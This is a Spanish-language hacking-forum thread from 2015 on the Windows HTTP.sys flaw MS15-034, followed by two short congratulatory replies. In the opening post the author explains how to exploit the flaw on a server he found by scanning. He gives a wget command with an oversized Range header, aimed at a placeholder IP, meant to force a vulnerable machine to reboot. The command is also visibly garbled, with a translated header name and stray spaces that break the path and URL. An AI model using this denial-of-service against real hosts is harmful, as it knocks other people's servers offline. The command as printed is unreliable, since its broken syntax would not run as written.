Underc0de

[In]Seguridad Informática => Bugs y Exploits => Topic started by: Aforak on October 30, 2015, 11:49:44 am

Title: Vulnerabilidad MS15-034 - HTTP.sys
Post by: Aforak on October 30, 2015, 11:49:44 am
Muy buenas underc0deanos, quiero explicar un tipo de vulnerabilidad en los sistemas windows que me encontré tras realizar un scan a una web ya que he encontrado poca información sobre esto y lo poco que he encontrado quisiera compartirlo para la gente que alguna vez encuentre este tipo de vulnerabilidad, comencemos :

¿De qué se trata esta vulnerabilidad?
La versión de Windows que se ejecuta en el host remoto se ve afectado por una vulnerabilidad en la pila del protocolo HTTP (HTTP.sys) debido a la inadecuada programación del análisis sintáctico sobre las peticiones HTTP artesanales. Un atacante remoto puede aprovechar esto para ejecutar código arbitrario con privilegios del sistema.
¿Cómo sé si una web contiene este fallo?
La verdad, no lo sé, en mi caso como ya dije que realicé un scan a una web, observé que había notificado esta vulnerabilidad de estado crítico y me informé de ella para saber cómo parchearla y explotarla.
(http://i.imgur.com/zbo3WCE.png)
¿Cómo puedo explotarla?
Fácil, usaremos wget(comando incluido en la terminal de Linux, si quieremos tenerlo para Windows debemos descargarlo de aquí :http://gnuwin32.sourceforge.net/packages/wget.htm)
Una vez lo tengamos en nuestro equipo usaremos el siguiente comando :
Code: You are not allowed to view links. Register or Login
wget -O / dev / null --header = "Rango: 0-18446744073709551615" http: // [dirección IP] /Este comando realiza el efecto de reiniciar el PC vulnerable, el comando wget consiste en descargar archivos de internet desde la terminal.
Si desean ver a qué sistemas afecta esta vulnerabilidad o tener más información --->https://technet.microsoft.com/library/security/ms15-034
En esa misma página pone que soluciones tiene de momento esta vulnerabilidad.
Si desean el escáner de vulnerabilidades Nessus aquí lo tienen --->https://www.tenable.com/products/nessus-home
Si desean ver el testeo de la penetración de esta vulnerabilidad aquí tenéis un vídeo realizado desde una VPS parece ser o algún software de virtualización

Espero que os sea útil mi aportamiento, grácias ;)
Fuente : Aforak / Jazze
Title: Re:Vulnerabilidad MS15-034 - HTTP.sys
Post by: ANTRAX on October 30, 2015, 12:03:25 pm
@Aforak (https://underc0de.org/foro/index.php?action=profile;u=42264)! muy buen aporte bro! Ahora me pondré a verlo en detalle!
Te dejo +c0in

Muchas gracias por compartirlo!!

Saludos!
ANTRAX
Title: Re:Vulnerabilidad MS15-034 - HTTP.sys
Post by: Stuxnet on October 30, 2015, 01:53:39 pm
Pedazo de aporte :3 muy bueno ..

Siempre vale la pena entrar y no ver temas c/p